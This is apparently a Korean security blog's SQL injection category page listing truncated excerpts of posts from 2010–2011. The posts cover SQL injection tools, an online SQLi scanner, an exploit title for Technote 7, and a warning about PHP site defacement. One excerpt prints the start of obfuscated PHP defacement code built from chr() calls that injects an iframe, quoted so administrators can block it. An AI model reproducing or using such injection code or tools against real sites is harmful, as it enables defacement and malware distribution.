본문 바로가기

SQL INJECTION51

SQL Injection Test SqlData v0.6 지원가능 데이터베이스 유형: - MySQL 시리즈 (버전: 4, 5) - MSSQL 시리즈 (버전: 2000, 2005, 2008) - Oracle 시리즈 (버전: 8, 9, 10, 11) 사용자 정의 확장 (1) 접미사 지원 (2) 사용자 정의 데이터베이스를 코딩 지원 (3) 공백으로 대체 키워드 치환, URL 인코딩, 암호화 매개 변수 지원 (4) 요원 지원 (5) 쿠키 세트 (6) 게시 주사 지원 (7) 파일 작업을 지원 (8) 명령 지원 시스템 스캔 (9) 디렉토리 지원 (10) 멀티 스레드 지원 (11) 웹 사이트는 자동으로 코드를 식별 SqlData 장점 : (1) 모듈형 구문을 실행 구문과 호환 (2) 멀티 스레드 및 최적화 솔루션 (3) 대용량의 데이터를 내보내기 지원 (4) 인터페이스에 .. 2011. 4. 4.
xuhaid SQLi Scanner V3 xuhaid SQLi Scanner V3 ✩ --Status:[online]-- I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools! Side Note: Better dork = more results! Keep that in mind! Ok In This Version We have 2 New Scanner's Public & Private ... And In this Version I have added Duplicate Link remover Soo that after scanning you guys can easily remove duplicate Links. Private Online SQLi Scanner V1 *Click .. 2011. 4. 1.
TechShop Technote 7 SQL Injection Vulnerability # Exploit Title: Technote7(Commercial Version, Free Version) 2011. 1. 6.
Mass SQL Injection Attack Code (PHP, MySQL) * 홈페이지 변조 및 Mass SQL Injection을 통해 대량 악성코드 유포 발생 - 최근 공격 코드 유형 파악해서 차단이나 알람 대응 필요 # 홈페이지 변조 코드 function gmfun($path){$daima=chr(60).chr(105).chr(102).chr(114).chr(97).chr(109).chr(101).chr(32).chr(115).chr(114).chr(99). chr(61).chr(38).chr(35).chr(120).chr(54).chr(56).chr(59).chr(38).chr(35).chr(120).chr(55).chr(52).chr(59). chr(38).chr(35).chr(120).chr(55).chr(52).chr(59).chr(38).chr(35).chr(12.. 2010. 12. 28.
홈페이지 변조 악성코드 삽입 (PHP 사용 주의) 최근에 발생되는 홈페이지 변조를 통해 악성코드를 삽입하여 유포되는 해킹사고가 있었으며 현재도 계속 진행중에 있습니다. 제로보드와 몇 사이트에서 관련 정보가 점차 오픈되면서 분석 내용과 조치 사항이 나오고 있는데 문제는 제로보드의 취약점만으로 본다는 것입니다. 현재는 공개된 PHP 웹솔루션 중 많이 알려진 제로보드를 통해 발생하고 있지만 이번에 확인된 문제는 특정 솔루션(제로보드)만의 문제가 아닐 수 있습니다. 이는 PHP 권고 방식을 사용하지 않을 경우 문제가 발생될 수 있어 위험한 수준에 있습니다. 단, 몇일전 포스팅한 PHP 안전한 환경에 언급한 옵션인 상태라면 현재로선 이번 사고에 대해서는 안전할 수 있을 것 같습니다. PHP 안전한 환경 (공개용 PHP 솔루션 사용시 주의사항) - http://b.. 2010. 12. 23.
728x90